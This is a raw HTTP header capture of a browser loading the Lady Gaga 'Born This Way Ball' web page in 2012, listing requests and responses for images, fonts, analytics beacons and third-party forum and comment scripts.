Connection: keep-alive
GET /bornthiswayball/images/btn-enter.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Wed, 30 Nov 2011 18:05:11 GMT
Accept-Ranges: bytes
Etag: &quot;80a5f1998aafcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 1838
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /bornthiswayball/images/bg2.jpg HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Tue, 10 Apr 2012 21:38:02 GMT
Accept-Ranges: bytes
Etag: &quot;09994346217cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 124157
Date: Tue, 06 Nov 2012 16:44:22 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:25 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1075984596&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1406227626&utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1075984596&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1406227626&amp;utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:26:07 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 487100
Server: GFE/2.0
GET /k/mxd3gmg-d.css?3bb2a6e53c9684ffdc9a9bf71b5b2a6295e5720163621489f1819d0db135269511600c2f7c2b8d7fceb0e6d16d4e2cdfcab2282e49be9f4c89c30a366459721fbcad6c743493934698da63b2c1a4d61fca95905b78b4234a4486d13bd13bb5fab6fb7cf00134e53e30fa2608a2d243 HTTP/1.1

Host: use.typekit.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css;charset=utf-8
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, max-age=604800
Date: Tue, 06 Nov 2012 16:44:22 GMT
Last-Modified: Thu, 01 Nov 2012 18:17:52 GMT
Server: ECS (arn/46E4)
Status: 200 OK
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 265791
GET /clientapps/v2/backplane.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31726
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Wed, 07 Nov 2012 07:55:42 GMT
Content-Length: 2935
Connection: keep-alive
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352220268556 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352220268556 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Tue, 06 Nov 2012 16:44:28 GMT
Expires: Tue, 13 Nov 2012 16:44:28 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /libs/v1/CustomReorder/CustomReorder.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:29 GMT
Etag: 6098cb196dd25d3da5c58263c016fbb3
Vary: Accept-Encoding
X-Trans-Id: txbe83af8c4f87405caf8eda18536f6c50
X-Timestamp: 1349707169.81449
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 09 May 2012 22:33:01 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2839
Cache-Control: public, max-age=175
Expires: Tue, 06 Nov 2012 16:47:23 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/trendingposts/trendingposts.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:11 GMT
Etag: 79e85f49b554f87cc40c5ad897d4de11
Vary: Accept-Encoding
X-Trans-Id: tx951f72ea99e740e5a4a664bd2a53d890
X-Timestamp: 1349706971.85098
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 03 Aug 2011 15:58:04 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2142
Cache-Control: public, max-age=511
Expires: Tue, 06 Nov 2012 16:52:59 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/forum/jquery.ba-hashchange.min.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:04 GMT
Etag: 5cdc6165b5488bcd11ccafc74cd6e235
Vary: Accept-Encoding
X-Timestamp: 1349707084.15363
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 10 Feb 2012 17:50:28 GMT
Accept-Ranges: bytes
X-Trans-Id: tx9f8a7ab097c346b38b8d93659840afcb
Content-Encoding: gzip
Content-Length: 856
Cache-Control: public, max-age=269
Expires: Tue, 06 Nov 2012 16:48:57 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/UpdateSort/UpdateSort2.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:08 GMT
Etag: f0812cfab19c08bcc826c01015b96b8e
Vary: Accept-Encoding
X-Trans-Id: tx481ae10981134de0bfbdfc6ff6c4af43
X-Timestamp: 1349706968.45941
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 25 Jun 2012 20:37:55 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 590
Cache-Control: public, max-age=625
Expires: Tue, 06 Nov 2012 16:54:53 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/analytics/analytics.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:40:13 GMT
Etag: bc20a8d63763854db8067f9c7a2a0f08
Vary: Accept-Encoding
X-Timestamp: 1349707213.66073
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 28 Sep 2012 14:56:50 GMT
Accept-Ranges: bytes
X-Trans-Id: tx696152b3b2e6492fbd58bce77f09c2fb
Content-Encoding: gzip
Content-Length: 3196
Cache-Control: public, max-age=134
Expires: Tue, 06 Nov 2012 16:46:42 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/lscache.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:14 GMT
Etag: 70cfc2962bcfe3c1fe6fc737ca39617a
Vary: Accept-Encoding
X-Trans-Id: txa65ddd09cb434ccc96d12fd353ddc2dd
X-Timestamp: 1349707034.27910
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 20 Jan 2012 20:50:36 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2086
Cache-Control: public, max-age=345
Expires: Tue, 06 Nov 2012 16:50:13 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/sonar.polls.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:14 GMT
Etag: 12ecde4ff8d73ad3260da86b2fcb3dc7
Vary: Accept-Encoding
X-Trans-Id: tx923e46e1080b4717b7acc28dbc807eff
X-N: S
X-Timestamp: 1349706974.67392
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 01 Oct 2012 14:33:07 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 7008
Cache-Control: public, max-age=549
Expires: Tue, 06 Nov 2012 16:53:37 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/EMBSubscription/EMBSubscription.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:25 GMT
Etag: 2e170a9195e064b54fdd986ff58189d1
Vary: Accept-Encoding
X-Timestamp: 1349707165.69901
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 29 Aug 2012 15:27:31 GMT
Accept-Ranges: bytes
X-Trans-Id: tx1e5a183f873f4858a6a73b095794d937
Content-Encoding: gzip
Content-Length: 3849
Cache-Control: public, max-age=160
Expires: Tue, 06 Nov 2012 16:47:08 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/HoverCard/HoverCard.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:28 GMT
Etag: be60e819c79c04116309ad0a92def299
Vary: Accept-Encoding
X-Trans-Id: tx43c8621a50b14f9f8979bfa0840999fd
X-Timestamp: 1349707048.27014
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 18 May 2012 16:17:01 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 16252
Cache-Control: public, max-age=823
Expires: Tue, 06 Nov 2012 16:58:11 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/ugcpoll.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:09 GMT
Etag: 36a342b951cabe24c724bc02942fe38b
Vary: Accept-Encoding
X-Trans-Id: tx41490a99514042aab35594ad590b5d90
X-Timestamp: 1349706969.94147
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 26 Sep 2012 19:50:49 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 3266
Cache-Control: public, max-age=310
Expires: Tue, 06 Nov 2012 16:49:38 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /clientapps/v2/submit.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31725
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Wed, 07 Nov 2012 07:55:43 GMT
Content-Length: 18717
Connection: keep-alive
GET /libs/v1/forum/edit.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:39 GMT
Etag: 7135f1ebf356dc557aa80d000b4004fa
Vary: Accept-Encoding
X-Trans-Id: tx7cea8c4a504d46b8889a83fbd2ed5f2d
X-Timestamp: 1349707119.37394
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 24 Sep 2012 20:07:11 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2044
Cache-Control: public, max-age=283
Expires: Tue, 06 Nov 2012 16:49:11 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/forum/localization/en.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:01 GMT
Etag: 220d7275783822637eda89e4fc7bcd46
Vary: Accept-Encoding
X-Trans-Id: tx828c593f26004e5fa2f0f933c27596f8
X-Timestamp: 1347849517.27825
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 27 Aug 2012 17:35:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2139
Cache-Control: public, max-age=585
Expires: Tue, 06 Nov 2012 16:54:13 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/forum/bumptopic.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:40 GMT
Etag: 28a49cd847eef74e589fdd86efa01053
Vary: Accept-Encoding
X-Trans-Id: tx24fb7c3742a146a0bd2502950c855c4c
X-Timestamp: 1349707120.97977
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 24 Sep 2012 19:17:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 518
Cache-Control: public, max-age=520
Expires: Tue, 06 Nov 2012 16:53:08 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /libs/v1/forum/jquery-ui-1.8.8.custom.min.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:03 GMT
Etag: 58ba17e3a3375e4fb49b7762fd53bd18
Vary: Accept-Encoding
X-Trans-Id: tx7be3b1865dc44b66935c0c08ce42d945
X-Timestamp: 1349707083.38558
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 10 Feb 2012 17:50:28 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 15838
Cache-Control: public, max-age=499
Expires: Tue, 06 Nov 2012 16:52:47 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /clientapps/v2/plugins/form-auth.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31724
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:11 GMT
Expires: Wed, 07 Nov 2012 07:55:44 GMT
Content-Length: 1590
Connection: keep-alive
GET /clientapps/v2/auth.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31724
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:58 GMT
Expires: Wed, 07 Nov 2012 07:55:44 GMT
Content-Length: 14561
Connection: keep-alive
GET /libs/v1/forum/core.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 17 Oct 2012 17:24:42 GMT
Etag: 2d154789dd42c02053dd4a32a916598e
Vary: Accept-Encoding
X-Timestamp: 1350494682.11721
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 17 Oct 2012 17:23:55 GMT
Accept-Ranges: bytes
X-Trans-Id: tx674711c7103d4e7f833e6566f5bdeb54
Content-Encoding: gzip
Content-Length: 32589
Cache-Control: public, max-age=560
Expires: Tue, 06 Nov 2012 16:53:48 GMT
Date: Tue, 06 Nov 2012 16:44:28 GMT
Connection: keep-alive
GET /clientapps/v2/user-list.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31726
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Wed, 07 Nov 2012 07:55:42 GMT
Content-Length: 15427
Connection: keep-alive
GET /clientapps/v2/stream.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
